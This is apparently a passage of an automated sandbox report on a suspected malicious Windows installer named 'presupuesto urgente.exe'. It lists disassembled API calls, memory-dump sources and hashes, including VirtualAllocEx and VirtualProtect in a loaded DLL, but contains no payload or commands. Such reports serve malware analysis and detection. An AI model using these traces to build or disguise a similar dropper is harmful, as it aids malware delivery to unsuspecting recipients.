                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: c52b64c4cba7ecf1fb5e1bb59396999cb3f4df188a1ab73f316032be63138ba7
                                                                                                                                                      • Instruction ID: 968097f9e37e498ed83c4652799cdf8e1ebeb5c7fee57b8dc09d96684c556b9e
                                                                                                                                                      • Opcode Fuzzy Hash: c52b64c4cba7ecf1fb5e1bb59396999cb3f4df188a1ab73f316032be63138ba7
                                                                                                                                                      • Instruction Fuzzy Hash: 27712471E04228CFDF28CFA8C854BADBBB1FB44305F15806AD856BB281C7786996DF45
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: c741c7bc90f3712fe41ea972859e43f39dd565e03f7b0e7aa23f6ef9dcbd7f18
                                                                                                                                                      • Instruction ID: 737cb098acab11621bc79b115fd6dc57f162d32c21417d2b0fd17844244e9397
                                                                                                                                                      • Opcode Fuzzy Hash: c741c7bc90f3712fe41ea972859e43f39dd565e03f7b0e7aa23f6ef9dcbd7f18
                                                                                                                                                      • Instruction Fuzzy Hash: 5A714571E04228CFEF28CF98C8447ADBBB1FB44305F14806AD956BB281C778A996DF45
                                                                                                                                                      APIs
                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004032D6
                                                                                                                                                        • Part of subcall function 00403441: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313F,?), ref: 0040344F
                                                                                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004031EC,00000004,00000000,00000000,?,?,00403166,000000FF,00000000,00000000,0040A230,?), ref: 00403309
                                                                                                                                                      • SetFilePointer.KERNELBASE(0014F4B2,00000000,00000000,00414ED0,00004000,?,00000000,004031EC,00000004,00000000,00000000,?,?,00403166,000000FF,00000000), ref: 00403404
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FilePointer$CountTick
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1092082344-0
                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402057
                                                                                                                                                        • Part of subcall function 00405414: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
                                                                                                                                                        • Part of subcall function 00405414: lstrlenW.KERNEL32(00402EEC,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
                                                                                                                                                        • Part of subcall function 00405414: lstrcatW.KERNEL32(00422708,00402EEC,00402EEC,00422708,00000000,00000000,00000000), ref: 0040546F
                                                                                                                                                        • Part of subcall function 00405414: SetWindowTextW.USER32(00422708,00422708), ref: 00405481
                                                                                                                                                        • Part of subcall function 00405414: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
                                                                                                                                                        • Part of subcall function 00405414: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
                                                                                                                                                        • Part of subcall function 00405414: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF
                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402068
                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020E5
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 334405425-0
                                                                                                                                                      APIs
                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00401BE1
                                                                                                                                                      • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Global$AllocFree
                                                                                                                                                      • String ID: Call
                                                                                                                                                      • API String ID: 3394109436-1824292864
                                                                                                                                                      APIs
                                                                                                                                                      • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402525
                                                                                                                                                      • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402538
                                                                                                                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsl6F0B.tmp,00000000,00000011,00000002), ref: 00402551
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Enum$CloseValue
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 397863658-0
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualAllocEx.KERNELBASE(00000000), ref: 1000295B
                                                                                                                                                      • GetLastError.KERNEL32 ref: 10002A62
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8114030407.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_10000000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocErrorLastVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 497505419-0
                                                                                                                                                      APIs
                                                                                                                                                      • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403166,000000FF,00000000,00000000,0040A230,?), ref: 004031DF
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                      APIs
                                                                                                                                                      • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024AF
                                                                                                                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsl6F0B.tmp,00000000,00000011,00000002), ref: 00402551
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseQueryValue
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3356406503-0
                                                                                                                                                      APIs
                                                                                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                      • Opcode ID: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                                                                                                      • Instruction ID: 4945fb4554c9d48a14a82d28c5fc4c127f2c3d85d8aa5c2a63fae023cf5e702c
                                                                                                                                                      • Opcode Fuzzy Hash: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                                                                                                      • Instruction Fuzzy Hash: AB01F431724210EBEB199B789D04B2A3698E710714F104A7FF855F62F1DA78CC529B5D
                                                                                                                                                      APIs
                                                                                                                                                      • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023AA
                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 004023B3
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseDeleteValue
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2831762973-0
                                                                                                                                                      • Opcode ID: 3500e27f67e3657d3f13e648c5a4e4955d4a6b8459d35a1d73aadda57e6becb1
                                                                                                                                                      • Instruction ID: eeebe11236d86b478005370e27fb04b66889edd8f93d7ff1d49de92df4b57ee5
                                                                                                                                                      • Opcode Fuzzy Hash: 3500e27f67e3657d3f13e648c5a4e4955d4a6b8459d35a1d73aadda57e6becb1
                                                                                                                                                      • Instruction Fuzzy Hash: 58F09632A04114DBE711BBA49B4EABEB2A59B44354F16053FFA02F71C1DEFC4D41866D
                                                                                                                                                      APIs
                                                                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 00401E61
                                                                                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00401E6C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$EnableShow
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1136574915-0
                                                                                                                                                      • Opcode ID: 611feb8e2eb8574bcf65ce6e82aff3c902186df27cfe016bcc5f4eefe149f0e3
                                                                                                                                                      • Instruction ID: 353457a250eeab47012712e359045a90ae935b3a48e85cb5936bf3a8ff6902a1
                                                                                                                                                      • Opcode Fuzzy Hash: 611feb8e2eb8574bcf65ce6e82aff3c902186df27cfe016bcc5f4eefe149f0e3
                                                                                                                                                      • Instruction Fuzzy Hash: 40E09232E08200CFD724DBA5AA4946D77B0EB84354720407FE112F11D1DA784881CF6D
                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,00000020,?,004034FB,0000000A), ref: 0040679C
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 004067B7
                                                                                                                                                        • Part of subcall function 0040671A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406731
                                                                                                                                                        • Part of subcall function 0040671A: wsprintfW.USER32 ref: 0040676C
                                                                                                                                                        • Part of subcall function 0040671A: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406780
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2547128583-0
                                                                                                                                                      • Opcode ID: 1fd694bbbc018e5f81eae6ff46d5e7dd0c39e86c0a2cf65890550c3579ed631a
                                                                                                                                                      • Instruction ID: 6fedc38abd16d04710e8a636fd16f84820eabe090bba127bd882252d3fb3e83b
                                                                                                                                                      • Opcode Fuzzy Hash: 1fd694bbbc018e5f81eae6ff46d5e7dd0c39e86c0a2cf65890550c3579ed631a
                                                                                                                                                      • Instruction Fuzzy Hash: 21E0863250421156D21096745E4893772AC9AC4718307843EF956F3041DB389C35A76D
                                                                                                                                                      APIs
                                                                                                                                                      • GetFileAttributesW.KERNELBASE(00000003,00402F57,C:\Users\user\Desktop\presupuesto urgente.exe,80000000,00000003), ref: 00405EA6
                                                                                                                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405EC8
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$AttributesCreate
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 415043291-0
                                                                                                                                                      • Opcode ID: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                                                                      • Instruction ID: 5201df1ff3c0a0bd0294a98706b79309786c42e99614e685d4e3591f63f4d9e2
                                                                                                                                                      • Opcode Fuzzy Hash: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                                                                      • Instruction Fuzzy Hash: D5D09E31254601AFEF098F20DE16F2E7AA2EB84B04F11552CB7C2940E0DA7158199B15
                                                                                                                                                      APIs
                                                                                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,0040347C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76893420,004036D5,?,00000006,00000008,0000000A), ref: 00405966
                                                                                                                                                      • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405974
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1375471231-0
                                                                                                                                                      APIs
                                                                                                                                                      • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402807
                                                                                                                                                        • Part of subcall function 004062F7: wsprintfW.USER32 ref: 00406304
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FilePointerwsprintf
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 327478801-0
                                                                                                                                                      APIs
                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040233D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: PrivateProfileStringWrite
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 390214022-0
                                                                                                                                                      APIs
                                                                                                                                                      • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CE8,00000000,?,?), ref: 00406274
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Create
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                                      APIs
                                                                                                                                                      • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,0040D022,0040CED0,004033C2,0040CED0,0040D022,00414ED0,00004000,?,00000000,004031EC,00000004), ref: 00405F68
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileWrite
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3934441357-0
                                                                                                                                                      APIs
                                                                                                                                                      • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040343E,0040A230,0040A230,00403342,00414ED0,00004000,?,00000000,004031EC), ref: 00405F39
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileRead
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E0
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8114030407.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8113998987.0000000010000000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.8114063244.0000000010003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.8114087670.0000000010005000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_10000000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                                      APIs
                                                                                                                                                      • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,00422708,?,?,004062AB,00422708,00000000,?,?,Call,?), ref: 00406241
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      APIs
                                                                                                                                                      • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      APIs
                                                                                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313F,?), ref: 0040344F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00405414: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
                                                                                                                                                        • Part of subcall function 00405414: lstrlenW.KERNEL32(00402EEC,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
                                                                                                                                                        • Part of subcall function 00405414: lstrcatW.KERNEL32(00422708,00402EEC,00402EEC,00422708,00000000,00000000,00000000), ref: 0040546F
                                                                                                                                                        • Part of subcall function 00405414: SetWindowTextW.USER32(00422708,00422708), ref: 00405481
                                                                                                                                                        • Part of subcall function 00405414: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
                                                                                                                                                        • Part of subcall function 00405414: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
                                                                                                                                                        • Part of subcall function 00405414: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF
                                                                                                                                                        • Part of subcall function 00405995: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059BE
                                                                                                                                                        • Part of subcall function 00405995: CloseHandle.KERNEL32(?), ref: 004059CB
                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F47
                                                                                                                                                        • Part of subcall function 0040683B: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040684C
                                                                                                                                                        • Part of subcall function 0040683B: GetExitCodeProcess.KERNEL32(?,?), ref: 0040686E
                                                                                                                                                        • Part of subcall function 004062F7: wsprintfW.USER32 ref: 00406304
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      APIs
                                                                                                                                                      • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      APIs
                                                                                                                                                      • GetDlgItem.USER32(?,00000403), ref: 004055B1
                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004055C0
                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004055FD
                                                                                                                                                      • GetSystemMetrics.USER32(00000002), ref: 00405604
                                                                                                                                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405625
                                                                                                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405636
                                                                                                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405649
                                                                                                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405657
                                                                                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040566A
                                                                                                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040568C
                                                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 004056A0
                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004056C1
                                                                                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004056D1
                                                                                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004056EA
                                                                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004056F6
                                                                                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 004055CF
                                                                                                                                                        • Part of subcall function 0040437A: SendMessageW.USER32(00000028,?,00000001,004041A5), ref: 00404388
                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405713
                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_000054E7,00000000), ref: 00405721
                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00405728
                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 0040574C
                                                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 00405751
                                                                                                                                                      • ShowWindow.USER32(00000008), ref: 0040579B
                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057CF
                                                                                                                                                      • CreatePopupMenu.USER32 ref: 004057E0
                                                                                                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004057F4
                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00405814
                                                                                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040582D
                                                                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405865
                                                                                                                                                      • OpenClipboard.USER32(00000000), ref: 00405875
                                                                                                                                                      • EmptyClipboard.USER32 ref: 0040587B
                                                                                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405887
                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00405891
                                                                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A5
                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004058C5
                                                                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 004058D0
                                                                                                                                                      • CloseClipboard.USER32 ref: 004058D6
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                      • String ID: (7B${
                                                                                                                                                      • API String ID: 590372296-525222780
                                                                                                                                                      • Opcode ID: f086514403ad079958e05c79f9398a2ee239ec86c73215fd307c521ee98444fa
                                                                                                                                                      • Instruction ID: f8c5fe522ebc9739dae7df13929d3a15495bf3740f19f89270c8c50aa4207807
                                                                                                                                                      • Opcode Fuzzy Hash: f086514403ad079958e05c79f9398a2ee239ec86c73215fd307c521ee98444fa
                                                                                                                                                      • Instruction Fuzzy Hash: AFB15870900608FFDB11AFA0DD85AAE7B79FB44354F00847AFA45B61A0CB754E51DF68
                                                                                                                                                      APIs
                                                                                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404DA8
                                                                                                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404DB3
                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404DFD
                                                                                                                                                      • LoadBitmapW.USER32(0000006E), ref: 00404E10
                                                                                                                                                      • SetWindowLongW.USER32(?,000000FC,00405388), ref: 00404E29
                                                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E3D
                                                                                                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E4F
                                                                                                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404E65
                                                                                                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404E71
                                                                                                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404E83
                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00404E86
                                                                                                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EB1
                                                                                                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EBD
                                                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F53
                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404F7E
                                                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F92
                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404FC1
